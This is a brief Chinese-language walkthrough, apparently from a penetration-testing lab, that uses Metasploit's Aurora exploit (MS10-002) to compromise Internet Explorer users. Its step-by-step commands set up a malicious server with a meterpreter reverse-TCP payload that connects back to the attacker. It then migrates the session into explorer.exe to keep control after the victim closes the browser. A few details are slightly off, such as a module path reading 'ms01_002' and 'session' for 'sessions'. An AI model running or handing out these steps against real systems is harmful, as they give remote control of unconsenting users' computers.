目的:利用ie浏览器的aurora漏洞获得目标shell权限
实战:
1.开启渗透利用框架
msfconsole
2.搜索这个漏洞(代号 ms10-002)
search ms10-002
3.使用搜索出的攻击模块
use exploit/windows/browser/ms01_002_aurora
4.显示要设置的参数
show options
5.设置参数(kali ip)
set SRVHOST 192.168.1.176
set SRVPORT 8080
set URIPATH xiaobai
6.设置载荷
1-5是设置我们的恶意服务器。这里设置载荷,当别人访问时,我们发送载荷(远控程序)
set payload windows/meterpreter/reverse_tcp
7.设置kali监听和端口(端口可以使用默认的4444也可以自己写)
set lhost 192.168.1.176
8.执行
run
复制如图网址,只要目标使用ie浏览器访问,他就会连接到我们kali的恶意服务器上,就有可能触发该漏洞
9.目标使用IE浏览器访问
10.kali自动向目标主机发送漏洞入侵的代码
利用成功后如图所示
注意:可能一直处于发送状态,此时要关闭IE,重新打开并输入网址
11.看后台有没有建立会话
先回车
session
发现已经建立会话
12.建立会话后
sessions 1
此时成功导出了meterpreter会话,入侵成功。输入?即可查看可以输入的命令
13.进程迁移(目标关闭浏览器后,继续控制)
(1)查看进程,并找到explorer.exe(资源管理器):
ps
(2)进程迁移(假如explorer.exe进程是4064)
migrate 4064
此时就算对方关闭浏览器,我们也能控制对方